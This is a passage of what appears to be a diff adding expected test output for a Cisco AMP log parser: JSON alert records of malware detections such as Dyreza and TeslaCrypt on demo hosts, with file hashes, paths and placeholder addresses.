"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 210041, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 211360, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668623368585250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 753000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668623368585000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 212679, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258878267719767", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258878267720000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 216643, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258826728112214", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 310000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258826728112000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 217962, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251202912550913", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 262000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251202912551000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 219281, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258706469027925", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 292000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258706469028000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 220867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:16:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258680699224148", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258680699224000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 222186, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668365670547487", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 428000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668365670547000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 223505, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668361375580188", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 616000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668361375580000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 227473, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258629159616595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 649000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258629159617000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 228792, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258577620009042", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 637000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258577620009000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 230111, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:28.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258526080401489", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 609000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258526080401000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 231430, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258474540793936", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 987000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258474540794000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 232749, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258423001186383", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 959000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258423001186000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 234068, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": 